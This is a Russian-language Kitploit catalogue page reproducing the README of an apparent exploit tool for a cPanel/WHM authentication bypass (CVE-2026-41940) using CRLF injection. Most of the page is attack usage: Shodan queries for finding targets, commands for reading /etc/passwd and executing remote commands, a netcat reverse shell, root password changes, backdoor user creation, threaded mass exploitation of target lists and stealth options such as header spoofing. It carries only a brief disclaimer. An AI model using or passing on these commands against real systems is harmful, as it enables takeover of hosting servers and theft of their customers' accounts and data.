Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и Управление

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

🚀 CVE-2026-41940 Эксплойт обхода аутентификации cPanel/WHM — лучший сценарий 💥 CRLF-инъекция приводит к обходу аутентификации, угону сессий и утечке аккаунтов. ✅ Прокси, кастомный UA, keep-alive, повторы, проверка SSL, цветной вывод, сохранение в файл. ⚡ Продвинутый PoC для пентестеров.

Red Teaming
Разработка Полезной Нагрузки
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

Репозиторий
921 месяц назадЕщё не проверено
Поделиться

CVE-2026-41940

🚀 CVE-2026-41940 - Эксплойт обхода аутентификации cPanel/WHM

Python License CVSS Pentesting

cPanel & WHM Edition - CRLF-инъекция для обхода аутентификации и полного перехвата сессии

📌 Обзор

Этот эксплойт использует CVE-2026-41940 — критическую уязвимость обхода аутентификации в cPanel/WHM. Внедряя специально сформированный CRLF-пейлоад в систему управления сессиями, он позволяет перехватывать сессии, получать root-доступ и полный контроль над панелью хостинга без каких-либо действительных учётных данных.

🔥 Ключевые возможности

🎯 Уязвимые версии

📍 Поиск Shodan

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ Отказ от ответственности: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ незаконен.

📦 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ Примеры использования

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 Команды интерактивной оболочки

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

🔧 Удалённое выполнение команд

root@kitploit:~
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 Обратная оболочка (Reverse Shell)

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 Пост-эксплуатационные операции

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 Массовая эксплуатация (несколько целей)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ Дополнительные параметры

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 Аргументы командной строки

🧪 Тестовая среда

root@kitploit:~
# Docker (if you want to test safely)
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

# Or with vulnerable version
docker pull cpanel/cpanel:11.102
docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 Связанные эксплойты

Ознакомьтесь с другими моими репозиториями эксплойтов:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
Скачать инструмент
КатегорияВозможности
Эксплуатация✅ Обход аутентификации через CRLF-инъекцию
✅ Перехват сессии WHM
✅ Утечка токена безопасности
✅ Мгновенный root-доступ
Пост-эксплуатация✅ Извлечение списка учётных записей (пользователь + домен)
✅ Удалённое выполнение команд (RCE)
✅ Обратная оболочка (совместима с netcat)
✅ Чтение файлов (конфиги, логи и т.д.)
✅ Смена пароля root
✅ Создание нового пользователя cPanel
Сканирование✅ Эксплуатация одной цели
✅ Массовое сканирование нескольких целей
✅ Многопоточность (настраиваемое количество потоков)
✅ Поддержка переопределения порта
Скрытность✅ Случайные задержки между запросами
✅ Подмена X-Forwarded-For
✅ Поддержка пользовательского User-Agent
✅ Поддержка прокси (HTTP/HTTPS)
Удобство использования✅ Интерактивная оболочка WHM (-i)
✅ Цветной вывод (colorama)
✅ Подробный/отладочный режим
✅ Экспорт списка учётных записей в файл
✅ Поток поддержания сессии Keep-Alive
✅ Механизм повторных попыток для нестабильных соединений
ПродуктВерсииСтатус
cPanel & WHM11.92 - 11.102✅ Подтверждено
cPanel & WHM11.104 - 11.110✅ Подтверждено
cPanel & WHM11.118 - 11.136⚠️ Ограничено
cPanel & WHM< 11.86✅ Вероятно, уязвима
КороткийДлинныйОписаниеПо умолчанию
-t--targetURL одной целиОбязательный (одиночный)
-l--target-fileФайл со списком целейОбязательный (массовый)
-p--portПереопределить портАвтоопределение
-o--outputСохранить список учётных записей в файлНет
-v--verboseВключить отладочный выводFalse
-i--interactiveИнтерактивная оболочка WHMFalse
--proxyHTTP/HTTPS проксиНет
-ua--user-agentПользовательский User-AgentСлучайный
--cmdВыполнить одну командуНет
--reverse-shellОбратная оболочка IP:PORTНет
--passwdСменить пароль rootНет
--adduserСоздать нового пользователя (USER DOMAIN PASS)Нет
--readПрочитать файл с целиНет
--threadsПотоки для массового сканирования10
--delayИнтервал keep-alive (секунды)3.0
--max-retriesМаксимум повторных попыток на запрос3
--no-keep-aliveНе поддерживать сессиюFalse
--ssl-verifyПроверять SSL-сертификатыFalse